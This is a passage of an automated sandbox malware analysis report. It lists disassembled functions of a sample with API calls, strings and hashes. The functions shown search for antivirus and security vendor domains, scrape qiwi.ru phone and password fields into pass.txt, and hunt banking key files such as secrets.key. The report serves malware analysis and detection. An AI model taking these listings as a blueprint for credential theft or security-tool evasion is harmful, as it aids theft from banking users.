                                                                                                                                                                                                                • Part of subcall function 012F98F0: recv.WS2_32(?,?,00000400,00000000), ref: 012F992F
                                                                                                                                                                                                                • Part of subcall function 012F98F0: recv.WS2_32(?,?,00000400,00000000), ref: 012F9945
                                                                                                                                                                                                                • Part of subcall function 012F98F0: closesocket.WS2_32(?), ref: 012F9959
                                                                                                                                                                                                                • Part of subcall function 012F98F0: closesocket.WS2_32(?), ref: 012F995C
                                                                                                                                                                                                                • Part of subcall function 012F98F0: ExitThread.KERNEL32 ref: 012F9960
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F9DFC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$Heap$send$Process$AllocThreadclosesocketshutdown$CloseCreateExitFreeHandleconnectgethostbynamehtonsinet_ntoasocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 699211285-0
                                                                                                                                                                                                              • Opcode ID: 46398b5be5ee41a6310c5320a5c02e5130c9ba127e3661bffa599cd5e1023af9
                                                                                                                                                                                                              • Instruction ID: 57be73e417b910b671f74b323372ad57bbd3b7f9f95958805f5cddf419f144ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46398b5be5ee41a6310c5320a5c02e5130c9ba127e3661bffa599cd5e1023af9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B491C3B1214342AEE720EF78CC85F6BBB9CAB94708F54582DF782961C1D674D584CB61
                                                                                                                                                                                                              Function 012E6100 Relevance: 36.1, APIs: 12, Strings: 12, Instructions: 71COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avast.com,?,?,012E626C), ref: 012E611B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kaspersky,?,?,012E626C), ref: 012E612B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,drweb,?,?,012E626C), ref: 012E6137
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,eset.com,?,?,012E626C), ref: 012E6143
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,antivir,?,?,012E626C), ref: 012E614F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avira,?,?,012E626C), ref: 012E615B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virustotal,?,?,012E626C), ref: 012E6167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virusinfo,?,?,012E626C), ref: 012E6173
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,012E626C), ref: 012E617F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,trendsecure,?,?,012E626C), ref: 012E618B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,anti-malware,?,?,012E626C), ref: 012E6197
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,.comodo.com,?,?,012E626C), ref: 012E61A3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                              • API String ID: 0-375433535
                                                                                                                                                                                                              • Opcode ID: d7becac9cefb5414a1092e57df051890de3c3ba5478e5cdbc7b5f7f11ff5a87f
                                                                                                                                                                                                              • Instruction ID: e2d1e2114ebab0ef22ecd9b985097295d77b5a040222e51bbd58256687bf8c77
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7becac9cefb5414a1092e57df051890de3c3ba5478e5cdbc7b5f7f11ff5a87f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B701597239276728BE13756E4C15EEF45CC0EA5CCCB814628E618E930BE687C20204B5
                                                                                                                                                                                                              Function 012E61B0 Relevance: 36.1, APIs: 12, Strings: 12, Instructions: 71COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,avast.com,?,?,012E62EC), ref: 012E61CB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,kaspersky,?,?,012E62EC), ref: 012E61DB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,drweb,?,?,012E62EC), ref: 012E61E7
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,eset.com,?,?,012E62EC), ref: 012E61F3
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,antivir,?,?,012E62EC), ref: 012E61FF
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,avira,?,?,012E62EC), ref: 012E620B
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,virustotal,?,?,012E62EC), ref: 012E6217
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,virusinfo,?,?,012E62EC), ref: 012E6223
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,z-oleg.com,?,?,012E62EC), ref: 012E622F
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,trendsecure,?,?,012E62EC), ref: 012E623B
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,anti-malware,?,?,012E62EC), ref: 012E6247
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,.comodo.com,?,?,012E62EC), ref: 012E6253
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                              • API String ID: 0-375433535
                                                                                                                                                                                                              • Opcode ID: 73cfd2d1e245ec1e0118e847b5417ca1443a1924c68cef5edd3e677b09f536dd
                                                                                                                                                                                                              • Instruction ID: faf53769a90b8c124fbe9759853a274966d3ab29f6e3e5ee57952fcccc169f89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73cfd2d1e245ec1e0118e847b5417ca1443a1924c68cef5edd3e677b09f536dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D012E7235672775A632316E0C75EDF42CC1EE199EB850528F704E150AE7869307046A
                                                                                                                                                                                                              Function 012FCC20 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 164sleepthreadsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 012FCC41
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012FCC52
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 012FCC60
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FCC69
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012FCC81
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FCC93
                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000), ref: 012FCCA5
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001C6F0,00000000,00000000,00000000), ref: 012FCCBA
                                                                                                                                                                                                              • Sleep.KERNEL32(0000EA60), ref: 012FCCCA
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FCCE4
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 012FCD4D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FCD74
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 012FCDD7
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FCDE2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashMutex$ExistsFileHandleOpenSleepThread$CloseCreateInformationReleaseTerminate
                                                                                                                                                                                                              • String ID: 61C5C0CB$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0Mw$pass.log$path.txt
                                                                                                                                                                                                              • API String ID: 2618501214-3699612867
                                                                                                                                                                                                              • Opcode ID: 3f04d46fbc1fcdc6ae1b30713182ccf5663928be9b56a132123ec559eb09846f
                                                                                                                                                                                                              • Instruction ID: 843544044d847b700945d5b4ed5a016125c2b4b81f91e2b857a85a5665605423
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f04d46fbc1fcdc6ae1b30713182ccf5663928be9b56a132123ec559eb09846f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C451053160835A5BCB32AF289825FABFFD8AB85B04F14442DFB85D7381DBA0D418C795
                                                                                                                                                                                                              Function 01301D30 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 157stringthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,w.qiwi.ru,?,00000000,?), ref: 01301D79
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,phone=), ref: 01301D8C
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,password=), ref: 01301D9F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C391), ref: 01301DCD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C391), ref: 01301E03
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 01301E6D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01301E77
                                                                                                                                                                                                              • #680.SHELL32 ref: 01301E7F
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01301E90
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01301E97
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01301EA4
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01301F30,00000000,00000000,00000000,?,00000000,?), ref: 01301EEA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01301F02
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301F13
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pathstrstr$BackslashCreateDirectoryErrorHandleLast$#680CloseCurrentFolderInformationMakeSystemThread
                                                                                                                                                                                                              • String ID: 61C5C391$GET $pass.txt$password=$phone=$w.qiwi.ru
                                                                                                                                                                                                              • API String ID: 2193638823-1298422488
                                                                                                                                                                                                              • Opcode ID: ca1cd8186e186baf984b861ae9c0b7f426d93d041ae8894d3ed35c92b66052cd
                                                                                                                                                                                                              • Instruction ID: 7cb5d58f3afa3b2a128414c53e64a81ebe05bae6888534e1b36b992c0a498246
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca1cd8186e186baf984b861ae9c0b7f426d93d041ae8894d3ed35c92b66052cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F551E1316002155BDB326A2C9C787FB7BE8BF51709F14425CE985D7281DBB0D948CBD4
                                                                                                                                                                                                              Function 012E1000 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 155memorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 012E101B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 012E103E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012E1045
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000013), ref: 012E1055
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 012E1073
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,name.key,00000000), ref: 012E1093
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01300810,00000000,00000000,00000000), ref: 012E10B9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\secrets.key), ref: 012E10D5
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013020D0,00000000,00000000,00000000), ref: 012E10E5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,sign.key), ref: 012E10FD
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01302BB0,00000000,00000000,00000000), ref: 012E1116
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012E112A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012E113B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E1150
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E1153
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E115F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E1162
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                              • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                              • API String ID: 3254303593-2345338882
                                                                                                                                                                                                              • Opcode ID: cd4cdf848b43ba525dd1558ded17f607c90ce8b9be27a018723bcd2d70bc0cd1
                                                                                                                                                                                                              • Instruction ID: 5dd07426ce895ba72661e2ac124bbb82874e1389a44d886f66beb5e5b93eb56c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd4cdf848b43ba525dd1558ded17f607c90ce8b9be27a018723bcd2d70bc0cd1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D4191312113627AE7326A6A9C8CDBF7EACEBC7F60B94422CFA1596184D735C511C7B0
                                                                                                                                                                                                              Function 012FB5C9 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 132sleepsynchronizationfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f,00000000,00000001), ref: 012FB5E6
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D788,00000000), ref: 012FB621
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FB627
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FB62F
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D788), ref: 012FB63E
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FB645
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 012FB67B
                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,0133D788,00000000), ref: 012FB6B3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 012FB6C6
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732},00000006), ref: 012FB6E3
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FB6E6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastMutexPathSleep$#680BackslashCopyDirectoryFileFolderMakeReleaseSystem
                                                                                                                                                                                                              • String ID: 61c5c09f$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 495793069-57594846
                                                                                                                                                                                                              • Opcode ID: f36d721f7ba32be07aee1c8edaa4d12e3e7393fc534cbae632aa3c3b39d008a1
                                                                                                                                                                                                              • Instruction ID: cbb92c15996dfc886af38c779a660d5dccccd13cf7625aa7f53ec44417654e42
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f36d721f7ba32be07aee1c8edaa4d12e3e7393fc534cbae632aa3c3b39d008a1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D04139316047425BEB322F78DC5DBAA7ED9AF8AB45F08401DFB46DB281CA608904C790
                                                                                                                                                                                                              Function 012EE000 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 211synchronizationwindowtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012EDF80: GetDesktopWindow.USER32(774D30D0,?,?,774D30D0,?,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDF8E
                                                                                                                                                                                                                • Part of subcall function 012EDF80: RealChildWindowFromPoint.USER32(00000000,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDF95
                                                                                                                                                                                                                • Part of subcall function 012EDF80: IsWindowVisible.USER32(00000000,774D30D0,?,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDFC1
                                                                                                                                                                                                                • Part of subcall function 012EDF80: GetParent.USER32(00000000,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDFC8
                                                                                                                                                                                                                • Part of subcall function 012EDF80: GetWindowLongA.USER32(00000000,000000EC,774D30D0,?,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDFD3
                                                                                                                                                                                                                • Part of subcall function 012EDF80: WindowFromPoint.USER32(774D30D0,?,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDFE8
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(?,?,012EA857,?,012EA857,?,774D30D0,?), ref: 012EE037
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,012EA857,00000002,00000064,?,?,012EA857,?,774D30D0,?), ref: 012EE05D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EE081
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012EE092
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 012EE09D
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012EE0BB
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 012EE0C6
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012EA857), ref: 012EE0D2
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002), ref: 012EE0E6
                                                                                                                                                                                                              • GetWindowInfo.USER32(?,?), ref: 012EE129
                                                                                                                                                                                                              • PtInRect.USER32(?,?,012EA857), ref: 012EE154
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012EE174
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,012EA857,00000002,00000064,000000FF), ref: 012EE1A3
                                                                                                                                                                                                              • MapWindowPoints.USER32(?,?,00000000,00000001), ref: 012EE1D0
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(?,00000000,?), ref: 012EE1DB
                                                                                                                                                                                                              • MapWindowPoints.USER32(?,00000000,00000000,00000001), ref: 012EE1F7
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(00000000,00000000,?), ref: 012EE202
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$FromPoint$ChildReal$MessagePointsSendTimeout$AncestorDesktopInfoMutexObjectParentRectReleaseSingleVisibleWait
                                                                                                                                                                                                              • String ID: <$P0Mw
                                                                                                                                                                                                              • API String ID: 1846550538-2464927828
                                                                                                                                                                                                              • Opcode ID: b36239421891687f0cbaa81913a48678a45938ddf79b40cd2b95cf510fa3f8ed
                                                                                                                                                                                                              • Instruction ID: 4ec51f0bd950b8ae6dea421b039f13caa9b158c0fb9de8c0a9143c6f510bef80
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b36239421891687f0cbaa81913a48678a45938ddf79b40cd2b95cf510fa3f8ed
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F561847561021AAFDB30DE58DC88EBE77ADEB84721F504219FE11E7284DA71DD41C760
                                                                                                                                                                                                              Function 013010C0 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 192memoryfilestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C387), ref: 013010F0
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01301131
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0130113B
                                                                                                                                                                                                              • #680.SHELL32 ref: 01301143
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01301154
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0130115B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0130119A
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 013011A7
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 013011F0
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 0130120C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 01301229
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000008,00004070,00000001,00000000,775B5CE0,?,012F3CE8,?), ref: 01309793
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapAlloc.KERNEL32(00000000,?,012F3CE8,?), ref: 01309796
                                                                                                                                                                                                                • Part of subcall function 01309780: memset.MSVCRT(00000000,00000000,00004070,?,012F3CE8,?), ref: 013097AB
                                                                                                                                                                                                                • Part of subcall function 01309780: CreateFileA.KERNEL32(012F3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,012F3CE8,?), ref: 01309802
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000000,00000000,?,012F3CE8,?), ref: 01309825
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapValidate.KERNEL32(00000000,?,012F3CE8,?), ref: 01309828
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000000,00000000,?,012F3CE8,?), ref: 01309834
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapFree.KERNEL32(00000000,?,012F3CE8,?), ref: 01309837
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?), ref: 01301258
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C387), ref: 01301277
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 013012DB
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 013012E8
                                                                                                                                                                                                                • Part of subcall function 01309910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,775B5CE0), ref: 01309991
                                                                                                                                                                                                                • Part of subcall function 01309910: _snprintf.MSVCRT(00000000,00000104,%s\*,00000000), ref: 013099AD
                                                                                                                                                                                                                • Part of subcall function 01309910: FindFirstFileA.KERNEL32(00000000,?), ref: 013099BC
                                                                                                                                                                                                                • Part of subcall function 01309910: LocalFree.KERNEL32(00000000), ref: 013099C9
                                                                                                                                                                                                                • Part of subcall function 01309910: wsprintfA.USER32(?,%s\%s,00000000,0000002E), ref: 01309A08
                                                                                                                                                                                                                • Part of subcall function 01309910: wsprintfA.USER32(00000000,%s\%s,00000000,?), ref: 01309A16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
